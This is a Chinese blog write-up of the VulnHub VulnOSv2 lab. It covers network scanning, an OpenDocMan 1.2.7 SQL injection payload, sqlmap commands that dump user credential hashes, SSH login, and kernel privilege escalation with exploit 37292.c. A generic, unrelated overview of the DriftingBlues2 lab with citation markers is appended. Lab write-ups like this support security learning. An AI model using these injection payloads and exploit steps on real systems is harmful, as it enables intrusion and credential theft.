Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

0x00 环境搭建

在这里插入图片描述
VritualBox配置网络为 host-only
VMware中kali加入 host-only 为Virtual Box的网卡

开启虚拟机报错 usb 2.0 什么的问题
修改usb设备为1.0

在这里插入图片描述

0x01 信息收集

  • ip探测
    netdiscover -i eth1 -r 192.168.56.0/24
    在这里插入图片描述

100是网关 101 是win10 104就是靶机

  • 端口服务识别

masscan -p 1-65535 --rate=1000 192.168.56.104

nmap -sC -sV -A -p 80,6667 192.168.56.104 -o port.txt

在这里插入图片描述

开启了
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open irc ngircd

OS details: Linux 3.2 - 4.9

0x02 漏洞挖掘

web思路

目录枚举 查看各个功能点 源码
手工+ 扫描器 cms

步骤一:枚举目录+主页挖掘

(1)kali dirsearch dirbuster 枚举
(2)审查主页各功能点

在这里插入图片描述
在这里发现一处隐藏目录 /jabcd0cs/

访问 http://192.168.56.104/jabcd0cs/

好像存在cms
在这里插入图片描述

步骤二:OpenDocMan v1.2.7 cms利用

(1)搜索OpenDocMan v1.2.7 cms漏洞

searchsploit OpenDocMan 1.2.7
在这里插入图片描述
searchsploit -m 32075

拷贝到当前目录

cat 32075.txt 查看利用方法

在这里插入图片描述

(2) 利用 漏洞

exp

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

爆表名

http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

在这里插入图片描述

直接用sqlmap吧

爆库名

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs --level 3 --batch

在这里插入图片描述

爆表名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs --tables

在这里插入图片描述

爆可能存在账号密码的字段名

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user --columns

在这里插入图片描述

爆username和password的字段值

sqlmap -u “http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user” -p add_value --level 3 --batch -D jabcd0cs -T odm_user -C username,password --dump

在这里插入图片描述
webmin | b78aae356709f8c31118ea613980954b |
| guest | 084e0343a0486ff05530df6c705c8bb4 (guest)

在这里插入图片描述

步骤三:尝试利用账号面ssh连接webmin

登录成功

在这里插入图片描述

0x03 提权

思路
内核漏洞提权
翻/bin/bash 用户的 文件找密码

步骤四:内核漏洞提权

(1) 查看exp
./linux-exploit-suggester.sh -u “Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux”

在这里插入图片描述
发现 dirtycow 和37292均可

(2) 下载 exp

searchsploit -m 3729

在这里插入图片描述
(3) gcc 编译 运行
gcc -o exp 37292.c

./exp

提权成功
在这里插入图片描述

之后尝试 dirty cow 40839.c的时候 把靶机搞崩了
还是有其他的先试其他的吧

在这里插入图片描述

0x04 总结

本靶机 比较简单
通过OpenDocMan 数据库管理系统存在的 sql注入漏洞 获取到 账号密码, 尝试登录ssh成功 直接 利用内核漏洞37292提权成功

### 关于VulnHub平台上的DriftingBlues2靶机 #### 信息概述 针对VulnHub上发布的`DriftingBlues-2`靶机,该系列旨在供给安全研究人员以及爱好者们一个实践环境来升自身的技能水平。这类虚拟机通常包含了多个层面的安全挑战,涉及但不限于Web应用攻击、网络服务漏洞挖掘等方面的内容[^1]。 #### 渗透测试流程概览 ##### 信息收集阶段 在这个环节里,参与者需要运用各种工具和技术手段对目标系统进行全面扫描与分析,目的是发现潜在可被利用的弱点和服务版本等重要情报。对于`DriftingBlues-2`而言,可能会涉及到端口扫描、指纹识别等工作项[^2]。 ##### 利用已知漏洞 一旦完成了初步的情报搜集工作之后,下一步就是尝试找出并验证那些存在于公开资料库中的已知缺陷是否适用于当前环境中。例如,在某些情况下可能存在过时软件组件所引发的风险点可以作为突破口之一[^3]。 ##### 获取初始访问限 成功定位到合适的切入点后,则可通过构造特定载荷或者执行其他形式的操作实现远程代码执行效果,进而获得受害主机的部分控制能力。此过程可能包括但不限于通过弱密码猜测登录SSH账户或是借助文件上传功能植入恶意脚本等方式达成目的[^4]。 ##### 限至管理员级别 当已经拥有了有限制性的操作许可时,进一步扩大影响力成为必要之举。此时应着眼于探索本地配置错误、未修补内核级Bug以及其他能够帮助完成这一跃迁路径的方法论之上。比如滥用sudoers设置不当之处便是一条可行之路线[^5]。 ##### 数据取与Flag获取 最终的目标是在整个过程中寻得证明己方胜利的关键证据——即所谓的“Flag”。它可能是隐藏在某个特殊位置下的文本字符串或者是经过加密处理后的密钥材料等形式存在。为了达到这个终点,往往还需要结合之前各个步骤积累下来的知识来进行综合判断和推理[^6]。 ```bash # 示例:简单的Nmap端口扫描命令用于信息收集 nmap -A <target_ip> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值